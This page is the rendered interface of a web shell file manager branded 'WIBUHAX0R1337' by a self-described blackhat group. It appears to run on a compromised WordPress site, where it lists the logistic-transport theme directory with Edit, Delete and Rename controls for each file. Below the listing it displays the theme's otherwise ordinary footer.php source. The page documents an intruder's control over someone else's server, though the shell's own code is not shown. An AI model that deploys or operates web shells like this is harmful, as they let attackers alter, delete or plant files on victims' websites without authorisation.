-
WIBUHAX0R1337
-
/
home
/
coludnqa
/
public_html
/
wp-content
/
themes
/
logistic-transport
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
css
--
NONE
images
--
NONE
inc
--
NONE
js
--
NONE
languages
--
NONE
page-template
--
NONE
template-parts
--
NONE
webfonts
--
NONE
woocommerce
--
NONE
.htaccess
0.231KB
Edit File
Delete File
Rename
404.php
1.453KB
Edit File
Delete File
Rename
archive.php
15.795KB
Edit File
Delete File
Rename
comments.php
2.104KB
Edit File
Delete File
Rename
footer.php
4.458KB
Edit File
Delete File
Rename
functions.php
23.596KB
Edit File
Delete File
Rename
header.php
11.134KB
Edit File
Delete File
Rename
image.php
16.37KB
Edit File
Delete File
Rename
index.php
13.99KB
Edit File
Delete File
Rename
license.txt
34.323KB
Edit File
Delete File
Rename
no-results.php
1.378KB
Edit File
Delete File
Rename
page.php
1.444KB
Edit File
Delete File
Rename
readme.txt
10.939KB
Edit File
Delete File
Rename
rtl.css
35.197KB
Edit File
Delete File
Rename
search.php
15.633KB
Edit File
Delete File
Rename
searchform.php
0.681KB
Edit File
Delete File
Rename
sidebar.php
0.882KB
Edit File
Delete File
Rename
single.php
3.345KB
Edit File
Delete File
Rename
style.css
37.84KB
Edit File
Delete File
Rename
tc-style.php
31.146KB
Edit File
Delete File
Rename
<?php /** * The template for displaying the footer. * * Contains the closing of the #content div and all content after * * @package Logistic Transport */ ?> <footer role="contentinfo"> <?php //Set widget areas classes based on user choice $logistic_transport_widget_areas = get_theme_mod('logistic_transport_footer_widget_layout', '4'); if ($logistic_transport_widget_areas == '3') { $cols = 'col-lg-4 col-md-4'; } elseif ($logistic_transport_widget_areas == '4') { $cols = 'col-lg-3 col-md-3'; } elseif ($logistic_transport_widget_areas == '2') { $cols = 'col-lg-6 col-md-6'; } else { $cols = 'col-lg-12 col-md-12'; } ?> <div class="footertown"> <div class="container"> <div class="row"> <?php if ( is_active_sidebar( 'footer-1' ) ) : ?> <div class="sidebar-column <?php echo esc_attr( $cols ); ?>"> <?php dynamic_sidebar( 'footer-1'); ?> </div> <?php endif; ?> <?php if ( is_active_sidebar( 'footer-2' ) ) : ?> <div class="sidebar-column <?php echo esc_attr( $cols ); ?>"> <?php dynamic_sidebar( 'footer-2'); ?> </div> <?php endif; ?> <?php if ( is_active_sidebar( 'footer-3' ) ) : ?> <div class="sidebar-column <?php echo esc_attr( $cols ); ?>"> <?php dynamic_sidebar( 'footer-3'); ?> </div> <?php endif; ?> <?php if ( is_active_sidebar( 'footer-4' ) ) : ?> <div class="sidebar-column <?php echo esc_attr( $cols ); ?>"> <?php dynamic_sidebar( 'footer-4'); ?> </div> <?php endif; ?> </div> </div> </div> <div id="footer"> <div class="container"> <p class="mb-0"><?php logistic_transport_credit_link(); ?> <?php echo esc_html(get_theme_mod('logistic_transport_footer_copy',__('By ThemesCaliber','logistic-transport'))); ?> </p> </div> </div> <?php if( get_theme_mod( 'logistic_transport_show_back_to_top',true) != '' || get_theme_mod('logistic_transport_responsive_show_back_to_top',true) != '') { ?> <?php $logistic_transport_scroll_lay = get_theme_mod( 'logistic_transport_back_to_top_alignment','Right'); if($logistic_transport_scroll_lay == 'Left'){ ?> <a href="#" class="scrollup left"><span><?php echo esc_html( get_theme_mod('logistic_transport_back_to_top_text',__('Back to Top', 'logistic-transport' )) ); ?><?php if(get_theme_mod('logistic_transport_back_to_top_icon') != 'None') {?><i class="<?php echo esc_html(get_theme_mod('logistic_transport_back_to_top_icon','fas fa-arrow-up')); ?> ms-2"></i><?php }?></span><span class="screen-reader-text"><?php echo esc_html( get_theme_mod('logistic_transport_back_to_top_text',__('Back to Top', 'logistic-transport' )) ); ?></span></a> <?php }else if($logistic_transport_scroll_lay == 'Center'){ ?> <a href="#" class="scrollup center"><span><?php echo esc_html( get_theme_mod('logistic_transport_back_to_top_text',__('Back to Top', 'logistic-transport' )) ); ?><?php if(get_theme_mod('logistic_transport_back_to_top_icon') != 'None') {?><i class="<?php echo esc_html(get_theme_mod('logistic_transport_back_to_top_icon','fas fa-arrow-up')); ?> ms-2"></i><?php }?></span><span class="screen-reader-text"><?php echo esc_html( get_theme_mod('logistic_transport_back_to_top_text',__('Back to Top', 'logistic-transport' )) ); ?></span></a> <?php }else{ ?> <a href="#" class="scrollup right"><span><?php echo esc_html( get_theme_mod('logistic_transport_back_to_top_text',__('Back to Top', 'logistic-transport' )) ); ?><?php if(get_theme_mod('logistic_transport_back_to_top_icon') != 'None') {?><i class="<?php echo esc_html(get_theme_mod('logistic_transport_back_to_top_icon','fas fa-arrow-up')); ?> ms-2"></i><?php }?></span><span class="screen-reader-text"><?php echo esc_html( get_theme_mod('logistic_transport_back_to_top_text',__('Back to Top', 'logistic-transport' )) ); ?></span></a> <?php }?> <?php }?> <?php wp_footer(); ?> </footer> </body> </html>
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat